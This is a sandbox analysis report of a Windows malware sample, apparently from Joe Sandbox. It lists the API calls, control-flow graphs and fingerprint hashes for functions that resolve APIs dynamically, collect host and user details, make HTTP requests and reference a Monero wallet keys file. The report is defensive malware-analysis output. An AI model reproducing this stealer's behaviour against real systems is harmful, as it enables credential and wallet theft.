                            • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00E4640F
                            • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00E46421
                            • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00E4644D
                            • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00E464BD
                            • InternetCloseHandle.WININET(00000000), ref: 00E4653F
                            • InternetCloseHandle.WININET(00000000), ref: 00E46549
                            • InternetCloseHandle.WININET(00000000), ref: 00E46553
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                            • String ID: ERROR$ERROR$GET
                            • API String ID: 3749127164-2509457195
                            • Opcode ID: f01b83815bf4cff82686ca8089003a62f7b247413964c2bbe084d474806b9484
                            • Instruction ID: a49c380f83d00d4025c9d9517d9dd1ad60cd76091b254798764600aa91844a8a
                            • Opcode Fuzzy Hash: f01b83815bf4cff82686ca8089003a62f7b247413964c2bbe084d474806b9484
                            • Instruction Fuzzy Hash: E6717E71A00218ABDF24DF90DC55BEEB7B5BB44700F1095A8F50A7B1C4DBB46A84CF52
                            Function 00E57690 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106memoryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1356 e57690-e576da GetWindowsDirectoryA 1357 e576e3-e57757 GetVolumeInformationA call e58e90 * 3 1356->1357 1358 e576dc 1356->1358 1365 e57768-e5776f 1357->1365 1358->1357 1366 e57771-e5778a call e58e90 1365->1366 1367 e5778c-e577a7 GetProcessHeap RtlAllocateHeap 1365->1367 1366->1365 1369 e577a9-e577b6 call e5aa50 1367->1369 1370 e577b8-e577e8 wsprintfA call e5aa50 1367->1370 1377 e5780e-e5781e 1369->1377 1370->1377
                            APIs
                            • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00E576D2
                            • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00E5770F
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E57793
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00E5779A
                            • wsprintfA.USER32 ref: 00E577D0
                              • Part of subcall function 00E5AA50: lstrcpy.KERNEL32(00E60E1A,00000000), ref: 00E5AA98
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                            • String ID: :$C$\
                            • API String ID: 1544550907-3809124531
                            • Opcode ID: 53d4df023e5db1bc34fba5b55702624d20cc5aaa26132192441bca89ebef2f28
                            • Instruction ID: 252aff486808ecc2f927bfe93b92bc92eb7d796408c9d07233aa2f3969839282
                            • Opcode Fuzzy Hash: 53d4df023e5db1bc34fba5b55702624d20cc5aaa26132192441bca89ebef2f28
                            • Instruction Fuzzy Hash: 2941C3B1D043589BDB10DF94DD45BDEBBB8AF08705F100499FA09BB280D7746A88CBA5
                            Function 00E579E0 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00E411B7), ref: 00E57A10
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00E57A17
                            • GetUserNameA.ADVAPI32(00000104,00000104), ref: 00E57A2F
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateNameProcessUser
                            • String ID:
                            • API String ID: 1296208442-0
                            • Opcode ID: afb44e62d41cd966ef1b42b5d19474a07088dc3658bcc252d26f8a22329d1838
                            • Instruction ID: d59fb4aa7145a2621f4ada274e55edbcb7be5ed8dbb97556dfad6a8ca9882e4d
                            • Opcode Fuzzy Hash: afb44e62d41cd966ef1b42b5d19474a07088dc3658bcc252d26f8a22329d1838
                            • Instruction Fuzzy Hash: E6F04FB1944209EBCB14DF98DD46BAEFBB8EB05711F10062AFA15A3780C77515448BA1
                            Function 00E41160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExitInfoProcessSystem
                            • String ID:
                            • API String ID: 752954902-0
                            • Opcode ID: 5fc7e6bdc56ffb53b47c246a6ec3bc464d50b5591dedd9a1bf2585bb8543322d
                            • Instruction ID: 4a6ed34b51c7fc5f659c71230405764f08f3074541e14776f044e3116437d5bf
                            • Opcode Fuzzy Hash: 5fc7e6bdc56ffb53b47c246a6ec3bc464d50b5591dedd9a1bf2585bb8543322d
                            • Instruction Fuzzy Hash: 73D05E74D0030C9BCB14DFE0D9496DDBB79FB08315F0005A4DD1572380EA305485CB65
                            Function 00E59F20 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684libraryloaderCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 633 e59f20-e59f2a 634 e5a346-e5a3da LoadLibraryA * 8 633->634 635 e59f30-e5a341 GetProcAddress * 43 633->635 636 e5a456-e5a45d 634->636 637 e5a3dc-e5a451 GetProcAddress * 5 634->637 635->634 638 e5a526-e5a52d 636->638 639 e5a463-e5a521 GetProcAddress * 8 636->639 637->636 640 e5a52f-e5a5a3 GetProcAddress * 5 638->640 641 e5a5a8-e5a5af 638->641 639->638 640->641 642 e5a5b5-e5a642 GetProcAddress * 6 641->642 643 e5a647-e5a64e 641->643 642->643 644 e5a654-e5a72a GetProcAddress * 9 643->644 645 e5a72f-e5a736 643->645 644->645 646 e5a7b2-e5a7b9 645->646 647 e5a738-e5a7ad GetProcAddress * 5 645->647 648 e5a7ec-e5a7f3 646->648 649 e5a7bb-e5a7e7 GetProcAddress * 2 646->649 647->646 650 e5a825-e5a82c 648->650 651 e5a7f5-e5a820 GetProcAddress * 2 648->651 649->648 652 e5a922-e5a929 650->652 653 e5a832-e5a91d GetProcAddress * 10 650->653 651->650 654 e5a98d-e5a994 652->654 655 e5a92b-e5a988 GetProcAddress * 4 652->655 653->652 656 e5a996-e5a9a9 GetProcAddress 654->656 657 e5a9ae-e5a9b5 654->657 655->654 656->657 658 e5a9b7-e5aa13 GetProcAddress * 4 657->658 659 e5aa18-e5aa19 657->659 658->659
                            APIs
                            • GetProcAddress.KERNEL32(75900000,009B7250), ref: 00E59F3D
                            • GetProcAddress.KERNEL32(75900000,009B73D0), ref: 00E59F55
                            • GetProcAddress.KERNEL32(75900000,009C9E40), ref: 00E59F6E
                            • GetProcAddress.KERNEL32(75900000,009C9DF8), ref: 00E59F86
                            • GetProcAddress.KERNEL32(75900000,009CDE50), ref: 00E59F9E
                            • GetProcAddress.KERNEL32(75900000,009CDE80), ref: 00E59FB7
                            • GetProcAddress.KERNEL32(75900000,009BC420), ref: 00E59FCF
                            • GetProcAddress.KERNEL32(75900000,009CDE20), ref: 00E59FE7
                            • GetProcAddress.KERNEL32(75900000,009CDCD0), ref: 00E5A000
                            • GetProcAddress.KERNEL32(75900000,009CDD18), ref: 00E5A018
                            • GetProcAddress.KERNEL32(75900000,009CDD48), ref: 00E5A030
                            • GetProcAddress.KERNEL32(75900000,009B7470), ref: 00E5A049
                            • GetProcAddress.KERNEL32(75900000,009B7130), ref: 00E5A061
                            • GetProcAddress.KERNEL32(75900000,009B7150), ref: 00E5A079
                            • GetProcAddress.KERNEL32(75900000,009B7290), ref: 00E5A092
                            • GetProcAddress.KERNEL32(75900000,009CDD30), ref: 00E5A0AA
                            • GetProcAddress.KERNEL32(75900000,009CDE38), ref: 00E5A0C2
                            • GetProcAddress.KERNEL32(75900000,009BC240), ref: 00E5A0DB
                            • GetProcAddress.KERNEL32(75900000,009B7190), ref: 00E5A0F3
                            • GetProcAddress.KERNEL32(75900000,009CDCE8), ref: 00E5A10B
                            • GetProcAddress.KERNEL32(75900000,009CDDD8), ref: 00E5A124
                            • GetProcAddress.KERNEL32(75900000,009CDE68), ref: 00E5A13C
                            • GetProcAddress.KERNEL32(75900000,009CDD00), ref: 00E5A154
                            • GetProcAddress.KERNEL32(75900000,009B7370), ref: 00E5A16D
                            • GetProcAddress.KERNEL32(75900000,009CDD60), ref: 00E5A185
                            • GetProcAddress.KERNEL32(75900000,009CDE08), ref: 00E5A19D
                            • GetProcAddress.KERNEL32(75900000,009CDD78), ref: 00E5A1B6
                            • GetProcAddress.KERNEL32(75900000,009CDD90), ref: 00E5A1CE
                            • GetProcAddress.KERNEL32(75900000,009CDDA8), ref: 00E5A1E6
                            • GetProcAddress.KERNEL32(75900000,009CDDC0), ref: 00E5A1FF
                            • GetProcAddress.KERNEL32(75900000,009CDDF0), ref: 00E5A217
                            • GetProcAddress.KERNEL32(75900000,009CD850), ref: 00E5A22F
                            • GetProcAddress.KERNEL32(75900000,009CD970), ref: 00E5A248
                            • GetProcAddress.KERNEL32(75900000,009CB140), ref: 00E5A260
                            • GetProcAddress.KERNEL32(75900000,009CD958), ref: 00E5A278
                            • GetProcAddress.KERNEL32(75900000,009CD700), ref: 00E5A291
                            • GetProcAddress.KERNEL32(75900000,009B71D0), ref: 00E5A2A9
                            • GetProcAddress.KERNEL32(75900000,009CD7F0), ref: 00E5A2C1
                            • GetProcAddress.KERNEL32(75900000,009B7270), ref: 00E5A2DA
                            • GetProcAddress.KERNEL32(75900000,009CD898), ref: 00E5A2F2
                            • GetProcAddress.KERNEL32(75900000,009CD808), ref: 00E5A30A
                            • GetProcAddress.KERNEL32(75900000,009B72D0), ref: 00E5A323
                            • GetProcAddress.KERNEL32(75900000,009B72F0), ref: 00E5A33B
                            • LoadLibraryA.KERNEL32(009CD820,?,00E55EF3,00E60AEB,?,?,?,?,?,?,?,?,?,?,00E60AEA,00E60AE7), ref: 00E5A34D
                            • LoadLibraryA.KERNEL32(009CD868,?,00E55EF3,00E60AEB,?,?,?,?,?,?,?,?,?,?,00E60AEA,00E60AE7), ref: 00E5A35E
                            • LoadLibraryA.KERNEL32(009CD8B0,?,00E55EF3,00E60AEB,?,?,?,?,?,?,?,?,?,?,00E60AEA,00E60AE7), ref: 00E5A370
                            • LoadLibraryA.KERNEL32(009CD7C0,?,00E55EF3,00E60AEB,?,?,?,?,?,?,?,?,?,?,00E60AEA,00E60AE7), ref: 00E5A382
                            • LoadLibraryA.KERNEL32(009CD838,?,00E55EF3,00E60AEB,?,?,?,?,?,?,?,?,?,?,00E60AEA,00E60AE7), ref: 00E5A393
                            • LoadLibraryA.KERNEL32(009CD6E8,?,00E55EF3,00E60AEB,?,?,?,?,?,?,?,?,?,?,00E60AEA,00E60AE7), ref: 00E5A3A5
                            • LoadLibraryA.KERNEL32(009CD8C8,?,00E55EF3,00E60AEB,?,?,?,?,?,?,?,?,?,?,00E60AEA,00E60AE7), ref: 00E5A3B7
                            • LoadLibraryA.KERNEL32(009CD760,?,00E55EF3,00E60AEB,?,?,?,?,?,?,?,?,?,?,00E60AEA,00E60AE7), ref: 00E5A3C8
                            • GetProcAddress.KERNEL32(75FD0000,009B7690), ref: 00E5A3EA
                            • GetProcAddress.KERNEL32(75FD0000,009CD880), ref: 00E5A402
                            • GetProcAddress.KERNEL32(75FD0000,009C9768), ref: 00E5A41A
                            • GetProcAddress.KERNEL32(75FD0000,009CD7A8), ref: 00E5A433
                            • GetProcAddress.KERNEL32(75FD0000,009B7730), ref: 00E5A44B
                            • GetProcAddress.KERNEL32(6FD30000,009BC100), ref: 00E5A470
                            • GetProcAddress.KERNEL32(6FD30000,009B7850), ref: 00E5A489
                            • GetProcAddress.KERNEL32(6FD30000,009BC0B0), ref: 00E5A4A1
                            • GetProcAddress.KERNEL32(6FD30000,009CD910), ref: 00E5A4B9
                            • GetProcAddress.KERNEL32(6FD30000,009CD6D0), ref: 00E5A4D2
                            • GetProcAddress.KERNEL32(6FD30000,009B77B0), ref: 00E5A4EA
                            • GetProcAddress.KERNEL32(6FD30000,009B74B0), ref: 00E5A502
                            • GetProcAddress.KERNEL32(6FD30000,009CD8E0), ref: 00E5A51B
                            • GetProcAddress.KERNEL32(763B0000,009B74D0), ref: 00E5A53C
                            • GetProcAddress.KERNEL32(763B0000,009B77F0), ref: 00E5A554
                            • GetProcAddress.KERNEL32(763B0000,009CD8F8), ref: 00E5A56D
                            • GetProcAddress.KERNEL32(763B0000,009CD988), ref: 00E5A585
                            • GetProcAddress.KERNEL32(763B0000,009B77D0), ref: 00E5A59D
                            • GetProcAddress.KERNEL32(750F0000,009BBCF0), ref: 00E5A5C3
                            • GetProcAddress.KERNEL32(750F0000,009BC038), ref: 00E5A5DB
                            • GetProcAddress.KERNEL32(750F0000,009CD928), ref: 00E5A5F3
                            • GetProcAddress.KERNEL32(750F0000,009B7810), ref: 00E5A60C
                            • GetProcAddress.KERNEL32(750F0000,009B7630), ref: 00E5A624
                            • GetProcAddress.KERNEL32(750F0000,009BBF48), ref: 00E5A63C
                            • GetProcAddress.KERNEL32(75A50000,009CD940), ref: 00E5A662
                            • GetProcAddress.KERNEL32(75A50000,009B7550), ref: 00E5A67A
                            • GetProcAddress.KERNEL32(75A50000,009C9778), ref: 00E5A692
                            • GetProcAddress.KERNEL32(75A50000,009CD9A0), ref: 00E5A6AB
                            • GetProcAddress.KERNEL32(75A50000,009CD718), ref: 00E5A6C3
                            • GetProcAddress.KERNEL32(75A50000,009B7830), ref: 00E5A6DB
                            • GetProcAddress.KERNEL32(75A50000,009B75B0), ref: 00E5A6F4
                            • GetProcAddress.KERNEL32(75A50000,009CD9B8), ref: 00E5A70C
                            • GetProcAddress.KERNEL32(75A50000,009CD730), ref: 00E5A724
                            • GetProcAddress.KERNEL32(75070000,009B74F0), ref: 00E5A746
                            • GetProcAddress.KERNEL32(75070000,009CD790), ref: 00E5A75E
                            • GetProcAddress.KERNEL32(75070000,009CD748), ref: 00E5A776
                            • GetProcAddress.KERNEL32(75070000,009CD778), ref: 00E5A78F
                            • GetProcAddress.KERNEL32(75070000,009CD7D8), ref: 00E5A7A7
                            • GetProcAddress.KERNEL32(74E50000,009B7510), ref: 00E5A7C8
                            • GetProcAddress.KERNEL32(74E50000,009B7650), ref: 00E5A7E1
                            • GetProcAddress.KERNEL32(75320000,009B7530), ref: 00E5A802
                            • GetProcAddress.KERNEL32(75320000,009CDCA0), ref: 00E5A81A
                            • GetProcAddress.KERNEL32(6F060000,009B7710), ref: 00E5A840
                            • GetProcAddress.KERNEL32(6F060000,009B76B0), ref: 00E5A858
                            • GetProcAddress.KERNEL32(6F060000,009B7570), ref: 00E5A870
                            • GetProcAddress.KERNEL32(6F060000,009CDBE0), ref: 00E5A889
                            • GetProcAddress.KERNEL32(6F060000,009B7590), ref: 00E5A8A1
                            • GetProcAddress.KERNEL32(6F060000,009B75D0), ref: 00E5A8B9
                            • GetProcAddress.KERNEL32(6F060000,009B7670), ref: 00E5A8D2
                            • GetProcAddress.KERNEL32(6F060000,009B76D0), ref: 00E5A8EA
                            • GetProcAddress.KERNEL32(6F060000,InternetSetOptionA), ref: 00E5A901
                            • GetProcAddress.KERNEL32(6F060000,HttpQueryInfoA), ref: 00E5A917
                            • GetProcAddress.KERNEL32(74E00000,009CDA30), ref: 00E5A939
                            • GetProcAddress.KERNEL32(74E00000,009C9828), ref: 00E5A951
                            • GetProcAddress.KERNEL32(74E00000,009CDA90), ref: 00E5A969
                            • GetProcAddress.KERNEL32(74E00000,009CDB98), ref: 00E5A982
                            • GetProcAddress.KERNEL32(74DF0000,009B76F0), ref: 00E5A9A3
                            • GetProcAddress.KERNEL32(6E330000,009CDC28), ref: 00E5A9C4
                            • GetProcAddress.KERNEL32(6E330000,009B7750), ref: 00E5A9DD
                            • GetProcAddress.KERNEL32(6E330000,009CDBF8), ref: 00E5A9F5
                            • GetProcAddress.KERNEL32(6E330000,009CDC10), ref: 00E5AA0D
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$LibraryLoad
                            • String ID: HttpQueryInfoA$InternetSetOptionA
                            • API String ID: 2238633743-1775429166
                            • Opcode ID: 290950d775ae3b4bbbb4377473969f09b70f1963996115c34259906cefe7bcae
                            • Instruction ID: 2487cec15579579fe7c0485bb482de47c4378b0902f32a18f8dad45d586a1e56
                            • Opcode Fuzzy Hash: 290950d775ae3b4bbbb4377473969f09b70f1963996115c34259906cefe7bcae
                            • Instruction Fuzzy Hash: CC6230B55412109FC36DDFA8EB88956F7BAB74D3013108A3AF929C3398DB7595C1CB60
                            Function 00E448D0 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479networkstringfileCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 801 e448d0-e44992 call e5aab0 call e44800 call e5aa50 * 5 InternetOpenA StrCmpCA 816 e44994 801->816 817 e4499b-e4499f 801->817 816->817 818 e449a5-e44b1d call e58cf0 call e5ac30 call e5abb0 call e5ab10 * 2 call e5acc0 call e5abb0 call e5ab10 call e5acc0 call e5abb0 call e5ab10 call e5ac30 call e5abb0 call e5ab10 call e5acc0 call e5abb0 call e5ab10 call e5acc0 call e5abb0 call e5ab10 call e5acc0 call e5ac30 call e5abb0 call e5ab10 * 2 InternetConnectA 817->818 819 e44f1b-e44f43 InternetCloseHandle call e5ade0 call e4a210 817->819 818->819 905 e44b23-e44b27 818->905 829 e44f45-e44f7d call e5ab30 call e5acc0 call e5abb0 call e5ab10 819->829 830 e44f82-e44ff2 call e58b20 * 2 call e5aab0 call e5ab10 * 8 819->830 829->830 906 e44b35 905->906 907 e44b29-e44b33 905->907 908 e44b3f-e44b72 HttpOpenRequestA 906->908 907->908 909 e44f0e-e44f15 InternetCloseHandle 908->909 910 e44b78-e44e78 call e5acc0 call e5abb0 call e5ab10 call e5ac30 call e5abb0 call e5ab10 call e5acc0 call e5abb0 call e5ab10 call e5acc0 call e5abb0 call e5ab10 call e5acc0 call e5abb0 call e5ab10 call e5acc0 call e5abb0 call e5ab10 call e5ac30 call e5abb0 call e5ab10 call e5acc0 call e5abb0 call e5ab10 call e5acc0 call e5abb0 call e5ab10 call e5ac30 call e5abb0 call e5ab10 call e5acc0 call e5abb0 call e5ab10 call e5acc0 call e5abb0 call e5ab10 call e5acc0 call e5abb0 call e5ab10 call e5acc0 call e5abb0 call e5ab10 call e5ac30 call e5abb0 call e5ab10 call e5aa50 call e5ac30 * 2 call e5abb0 call e5ab10 * 2 call e5ade0 lstrlen call e5ade0 * 2 lstrlen call e5ade0 HttpSendRequestA 908->910 909->819 1021 e44e82-e44eac InternetReadFile 910->1021 1022 e44eb7-e44f09 InternetCloseHandle call e5ab10 1021->1022 1023 e44eae-e44eb5 1021->1023 1022->909 1023->1022 1024 e44eb9-e44ef7 call e5acc0 call e5abb0 call e5ab10 1023->1024 1024->1021
                            APIs
                              • Part of subcall function 00E5AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00E5AAF6
                              • Part of subcall function 00E44800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00E44889
                              • Part of subcall function 00E44800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00E44899
                              • Part of subcall function 00E5AA50: lstrcpy.KERNEL32(00E60E1A,00000000), ref: 00E5AA98
                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00E44965
                            • StrCmpCA.SHLWAPI(?,009CF3B0), ref: 00E4498A
                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00E44B0A
                            • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00E60DDE,00000000,?,?,00000000,?,",00000000,?,009CF330), ref: 00E44E38
                            • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00E44E54
                            • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00E44E68
                            • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00E44E99
                            • InternetCloseHandle.WININET(00000000), ref: 00E44EFD
                            • InternetCloseHandle.WININET(00000000), ref: 00E44F15
                            • HttpOpenRequestA.WININET(00000000,009CF2F0,?,009CE8D8,00000000,00000000,00400100,00000000), ref: 00E44B65
                              • Part of subcall function 00E5ACC0: lstrlen.KERNEL32(?,009C99B8,?,\Monero\wallet.keys,00E60E1A), ref: 00E5ACD5
                              • Part of subcall function 00E5ACC0: lstrcpy.KERNEL32(00000000), ref: 00E5AD14
                              • Part of subcall function 00E5ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E5AD22
                              • Part of subcall function 00E5ABB0: lstrcpy.KERNEL32(?,00E60E1A), ref: 00E5AC15
